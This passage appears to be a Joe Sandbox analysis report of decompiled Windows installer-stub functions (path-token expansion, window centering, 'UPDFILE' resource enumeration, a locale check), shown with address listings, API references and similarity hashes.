                                                                                                                                                                                                      • Opcode Fuzzy Hash: be39802b8c3547158c87b17f22d67a2f1cc0b041d8d79213f258ebfb534d54b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7001B132240114ABDF169FA5DC0C96EBB74EF1A702F104110FA47965A0CFB09F53CB85
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E00A62AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				char _t32;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				char* _t38;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                                      				CHAR* _t59;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t60 = __edx;
                                                                                                                                                                                                      				_t16 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                      				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                      				_t65 = _a4;
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t64 = __ecx;
                                                                                                                                                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                      					GetModuleFileNameA( *0xa69a3c,  &_v268, 0x104);
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_t17 =  *_t64;
                                                                                                                                                                                                      						if(_t17 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                      						 *_t65 =  *_t64;
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t65[1] = _t64[1];
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *_t64 != 0x23) {
                                                                                                                                                                                                      							L19:
                                                                                                                                                                                                      							_t65 = CharNextA(_t65);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 = CharNextA(_t64);
                                                                                                                                                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                      									if( *_t64 == 0x23) {
                                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00A61680(_t65, E00A617C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      									_t52 = _t65;
                                                                                                                                                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                      									_t60 = _t14;
                                                                                                                                                                                                      									do {
                                                                                                                                                                                                      										_t32 =  *_t52;
                                                                                                                                                                                                      										_t52 =  &(_t52[1]);
                                                                                                                                                                                                      									} while (_t32 != 0);
                                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								E00A665E8( &_v268);
                                                                                                                                                                                                      								_t55 =  &_v268;
                                                                                                                                                                                                      								_t62 = _t55 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t34 =  *_t55;
                                                                                                                                                                                                      									_t55 = _t55 + 1;
                                                                                                                                                                                                      								} while (_t34 != 0);
                                                                                                                                                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                      									 *_t38 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								E00A61680(_t65, E00A617C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      								_t59 = _t65;
                                                                                                                                                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                      								_t60 = _t12;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t42 =  *_t59;
                                                                                                                                                                                                      									_t59 =  &(_t59[1]);
                                                                                                                                                                                                      								} while (_t42 != 0);
                                                                                                                                                                                                      								L17:
                                                                                                                                                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t64 = CharNextA(_t64);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *_t65 = _t17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                      			}






















                                                                                                                                                                                                      0x00a62aac
                                                                                                                                                                                                      0x00a62ab7
                                                                                                                                                                                                      0x00a62abc
                                                                                                                                                                                                      0x00a62abe
                                                                                                                                                                                                      0x00a62ac3
                                                                                                                                                                                                      0x00a62ac6
                                                                                                                                                                                                      0x00a62ac9
                                                                                                                                                                                                      0x00a62ace
                                                                                                                                                                                                      0x00a62ae6
                                                                                                                                                                                                      0x00a62bdc
                                                                                                                                                                                                      0x00a62bdc
                                                                                                                                                                                                      0x00a62be0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62af2
                                                                                                                                                                                                      0x00a62afc
                                                                                                                                                                                                      0x00a62b00
                                                                                                                                                                                                      0x00a62b05
                                                                                                                                                                                                      0x00a62b05
                                                                                                                                                                                                      0x00a62b0b
                                                                                                                                                                                                      0x00a62bca
                                                                                                                                                                                                      0x00a62bd1
                                                                                                                                                                                                      0x00a62b11
                                                                                                                                                                                                      0x00a62b18
                                                                                                                                                                                                      0x00a62b26
                                                                                                                                                                                                      0x00a62b99
                                                                                                                                                                                                      0x00a62bc8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62b9b
                                                                                                                                                                                                      0x00a62bae
                                                                                                                                                                                                      0x00a62bb3
                                                                                                                                                                                                      0x00a62bb5
                                                                                                                                                                                                      0x00a62bb5
                                                                                                                                                                                                      0x00a62bb8
                                                                                                                                                                                                      0x00a62bb8
                                                                                                                                                                                                      0x00a62bba
                                                                                                                                                                                                      0x00a62bbb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62bb8
                                                                                                                                                                                                      0x00a62b28
                                                                                                                                                                                                      0x00a62b2e
                                                                                                                                                                                                      0x00a62b33
                                                                                                                                                                                                      0x00a62b39
                                                                                                                                                                                                      0x00a62b3c
                                                                                                                                                                                                      0x00a62b3c
                                                                                                                                                                                                      0x00a62b3e
                                                                                                                                                                                                      0x00a62b3f
                                                                                                                                                                                                      0x00a62b55
                                                                                                                                                                                                      0x00a62b5d
                                                                                                                                                                                                      0x00a62b64
                                                                                                                                                                                                      0x00a62b64
                                                                                                                                                                                                      0x00a62b7a
                                                                                                                                                                                                      0x00a62b7f
                                                                                                                                                                                                      0x00a62b81
                                                                                                                                                                                                      0x00a62b81
                                                                                                                                                                                                      0x00a62b84
                                                                                                                                                                                                      0x00a62b84
                                                                                                                                                                                                      0x00a62b86
                                                                                                                                                                                                      0x00a62b87
                                                                                                                                                                                                      0x00a62bbf
                                                                                                                                                                                                      0x00a62bc1
                                                                                                                                                                                                      0x00a62bc1
                                                                                                                                                                                                      0x00a62b26
                                                                                                                                                                                                      0x00a62bda
                                                                                                                                                                                                      0x00a62bda
                                                                                                                                                                                                      0x00a62be6
                                                                                                                                                                                                      0x00a62be6
                                                                                                                                                                                                      0x00a62bf8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A62AE6
                                                                                                                                                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A62AF2
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 00A62B12
                                                                                                                                                                                                      • CharUpperA.USER32 ref: 00A62B1E
                                                                                                                                                                                                      • CharPrevA.USER32(?,?), ref: 00A62B55
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 00A62BD4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 571164536-0
                                                                                                                                                                                                      • Opcode ID: 8ef88c65b844a6a59b55f938a501a4cc21bea40c3c94048c1b827717d7c05dbc
                                                                                                                                                                                                      • Instruction ID: 58ff84b66f462eba5127311e926b724b0bed7d8de8c90450a34a8d76636f25a8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ef88c65b844a6a59b55f938a501a4cc21bea40c3c94048c1b827717d7c05dbc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F04112346086455EDB159F348C14BFD7FB9DF62300F08419AE8C297202DBB58E87CB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00A643D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				struct tagRECT _v24;
                                                                                                                                                                                                      				struct tagRECT _v40;
                                                                                                                                                                                                      				struct HWND__* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				int _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				int _v60;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				void* _t53;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				struct HWND__* _t63;
                                                                                                                                                                                                      				struct HWND__* _t67;
                                                                                                                                                                                                      				struct HWND__* _t68;
                                                                                                                                                                                                      				struct HDC__* _t69;
                                                                                                                                                                                                      				int _t72;
                                                                                                                                                                                                      				signed int _t74;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t63 = __edx;
                                                                                                                                                                                                      				_t29 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                      				_t68 = __edx;
                                                                                                                                                                                                      				_v44 = __ecx;
                                                                                                                                                                                                      				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                      				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                      				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                      				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                      				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                      				_t69 = GetDC(_v44);
                                                                                                                                                                                                      				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                      				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                      				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                      				_t56 = _v48;
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                      				_t67 = 0;
                                                                                                                                                                                                      				if(_t72 >= 0) {
                                                                                                                                                                                                      					_t63 = _v52;
                                                                                                                                                                                                      					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                      						_t72 = _t63 - _t56;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t72 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                      				if(_t59 >= 0) {
                                                                                                                                                                                                      					_t63 = _v60;
                                                                                                                                                                                                      					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                      						_t59 = _t63 - _t53;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t59 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                      			}
























                                                                                                                                                                                                      0x00a643d0
                                                                                                                                                                                                      0x00a643d8
                                                                                                                                                                                                      0x00a643df
                                                                                                                                                                                                      0x00a643e6
                                                                                                                                                                                                      0x00a643ec
                                                                                                                                                                                                      0x00a643f1
                                                                                                                                                                                                      0x00a64400
                                                                                                                                                                                                      0x00a64403
                                                                                                                                                                                                      0x00a6440b
                                                                                                                                                                                                      0x00a64420
                                                                                                                                                                                                      0x00a64429
                                                                                                                                                                                                      0x00a64437
                                                                                                                                                                                                      0x00a64444
                                                                                                                                                                                                      0x00a64447
                                                                                                                                                                                                      0x00a6444d
                                                                                                                                                                                                      0x00a64454
                                                                                                                                                                                                      0x00a6445b
                                                                                                                                                                                                      0x00a64460
                                                                                                                                                                                                      0x00a64461
                                                                                                                                                                                                      0x00a64467
                                                                                                                                                                                                      0x00a6446f
                                                                                                                                                                                                      0x00a64473
                                                                                                                                                                                                      0x00a64473
                                                                                                                                                                                                      0x00a64463
                                                                                                                                                                                                      0x00a64463
                                                                                                                                                                                                      0x00a64463
                                                                                                                                                                                                      0x00a6447a
                                                                                                                                                                                                      0x00a64481
                                                                                                                                                                                                      0x00a64484
                                                                                                                                                                                                      0x00a6448a
                                                                                                                                                                                                      0x00a64492
                                                                                                                                                                                                      0x00a64496
                                                                                                                                                                                                      0x00a64496
                                                                                                                                                                                                      0x00a64486
                                                                                                                                                                                                      0x00a64486
                                                                                                                                                                                                      0x00a64486
                                                                                                                                                                                                      0x00a644b8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00A643F1
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A6440B
                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00A64423
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A6442E
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A6443A
                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00A64447
                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A644A2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2212493051-0
                                                                                                                                                                                                      • Opcode ID: 173465f145bd08604f9bceda1eb39473197da2ac3e02b6c5612d97dd68d91f7d
                                                                                                                                                                                                      • Instruction ID: d29873db8ddb0c4fd71ff18125fe6ef4ab6a66798755ada87624de14dc3ac41a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 173465f145bd08604f9bceda1eb39473197da2ac3e02b6c5612d97dd68d91f7d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0312B72E00119AFCB14CFF8DD899EEBBB5EB89310F154269F905B3250DA74AD058B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                                                                      			E00A66298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				struct HINSTANCE__* _v36;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				struct HRSRC__* _t21;
                                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				struct HINSTANCE__* _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t16 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                      				_t46 = 0;
                                                                                                                                                                                                      				_v32 = __ecx;
                                                                                                                                                                                                      				_v36 = 0;
                                                                                                                                                                                                      				_t36 = 1;
                                                                                                                                                                                                      				E00A6171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t51 = _t51 + 0x10;
                                                                                                                                                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                      					if(_t45 == 0) {
                                                                                                                                                                                                      						 *0xa69124 = 0x80070714;
                                                                                                                                                                                                      						_t36 = _t46;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                      						_t44 = _t5;
                                                                                                                                                                                                      						_t40 = _t44;
                                                                                                                                                                                                      						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                      						_t47 = _t6;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t26 =  *_t40;
                                                                                                                                                                                                      							_t40 = _t40 + 1;
                                                                                                                                                                                                      						} while (_t26 != 0);
                                                                                                                                                                                                      						_t41 = _t40 - _t47;
                                                                                                                                                                                                      						_t46 = _t51;
                                                                                                                                                                                                      						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                      						 *0xa6a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                      						_t30 = _v32();
                                                                                                                                                                                                      						if(_t51 != _t51) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(_t45);
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							_t36 = 0;
                                                                                                                                                                                                      							FreeResource(??);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							FreeResource();
                                                                                                                                                                                                      							_v36 = _v36 + 1;
                                                                                                                                                                                                      							E00A6171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                      							_t46 = 0;
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					return E00A66CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}






















                                                                                                                                                                                                      0x00a66298
                                                                                                                                                                                                      0x00a662a0
                                                                                                                                                                                                      0x00a662a7
                                                                                                                                                                                                      0x00a662ad
                                                                                                                                                                                                      0x00a662af
                                                                                                                                                                                                      0x00a662bb
                                                                                                                                                                                                      0x00a662c3
                                                                                                                                                                                                      0x00a662c4
                                                                                                                                                                                                      0x00a6633b
                                                                                                                                                                                                      0x00a6633b
                                                                                                                                                                                                      0x00a66345
                                                                                                                                                                                                      0x00a6634d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a662da
                                                                                                                                                                                                      0x00a662de
                                                                                                                                                                                                      0x00a6635f
                                                                                                                                                                                                      0x00a66369
                                                                                                                                                                                                      0x00a662e0
                                                                                                                                                                                                      0x00a662e0
                                                                                                                                                                                                      0x00a662e0
                                                                                                                                                                                                      0x00a662e3
                                                                                                                                                                                                      0x00a662e5
                                                                                                                                                                                                      0x00a662e5
                                                                                                                                                                                                      0x00a662e8
                                                                                                                                                                                                      0x00a662e8
                                                                                                                                                                                                      0x00a662ea
                                                                                                                                                                                                      0x00a662eb
                                                                                                                                                                                                      0x00a662ef
                                                                                                                                                                                                      0x00a662f1
                                                                                                                                                                                                      0x00a662f3
                                                                                                                                                                                                      0x00a66302
                                                                                                                                                                                                      0x00a66308
                                                                                                                                                                                                      0x00a6630d
                                                                                                                                                                                                      0x00a66314
                                                                                                                                                                                                      0x00a66314
                                                                                                                                                                                                      0x00a66316
                                                                                                                                                                                                      0x00a66319
                                                                                                                                                                                                      0x00a66355
                                                                                                                                                                                                      0x00a66357
                                                                                                                                                                                                      0x00a6631b
                                                                                                                                                                                                      0x00a6631b
                                                                                                                                                                                                      0x00a66331
                                                                                                                                                                                                      0x00a66334
                                                                                                                                                                                                      0x00a66339
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66339
                                                                                                                                                                                                      0x00a66319
                                                                                                                                                                                                      0x00a6636b
                                                                                                                                                                                                      0x00a6637d
                                                                                                                                                                                                      0x00a6637d
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6171E: _vsnprintf.MSVCRT ref: 00A61750
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A651CA,00000004,00000024,00A62F71,?,00000002,00000000), ref: 00A662CD
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A651CA,00000004,00000024,00A62F71,?,00000002,00000000), ref: 00A662D4
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A651CA,00000004,00000024,00A62F71,?,00000002,00000000), ref: 00A6631B
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A66345
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A651CA,00000004,00000024,00A62F71,?,00000002,00000000), ref: 00A66357
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                      • String ID: UPDFILE%lu
                                                                                                                                                                                                      • API String ID: 2922116661-2329316264
                                                                                                                                                                                                      • Opcode ID: 19c59aee9a1ff74ca2e737a1e18a51d5ff60279d0dfcb5e9cfc0a85978ea4635
                                                                                                                                                                                                      • Instruction ID: 9bcfd931c23e7bbac2e0e04a4fa626a837ce825271254023d25e63f4bdfd0b70
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19c59aee9a1ff74ca2e737a1e18a51d5ff60279d0dfcb5e9cfc0a85978ea4635
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C210271A00219ABDB10DFA4DC499FFBB7CFF49710B040229FA02A7241DB759D068BE0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00A6681F(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                      				void* _v172;
                                                                                                                                                                                                      				int* _v176;
                                                                                                                                                                                                      				int _v180;
                                                                                                                                                                                                      				int _v184;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t31;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      				void* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t36 = __ebx;
                                                                                                                                                                                                      				_t19 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                      				_t41 =  *0xa681d8; // 0xfffffffe
                                                                                                                                                                                                      				_t43 = 0;
                                                                                                                                                                                                      				_v180 = 0xc;
                                                                                                                                                                                                      				_v176 = 0;
                                                                                                                                                                                                      				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                      					 *0xa681d8 = 0;
                                                                                                                                                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      						_t41 =  *0xa681d8; // 0xfffffffe
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t41 = 1;
                                                                                                                                                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t31 = RegQueryValueExA(_v172, 0xa61140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                      							_t43 = _t31;
                                                                                                                                                                                                      							RegCloseKey(_v172);
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t40 =  &_v176;
                                                                                                                                                                                                      								if(E00A666F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                      										 *0xa681d8 = _t41;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L12;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00a6681f
                                                                                                                                                                                                      0x00a6682a
                                                                                                                                                                                                      0x00a66831
                                                                                                                                                                                                      0x00a66836
                                                                                                                                                                                                      0x00a6683c
                                                                                                                                                                                                      0x00a6683e
                                                                                                                                                                                                      0x00a66848
                                                                                                                                                                                                      0x00a66851
                                                                                                                                                                                                      0x00a6685d
                                                                                                                                                                                                      0x00a66864
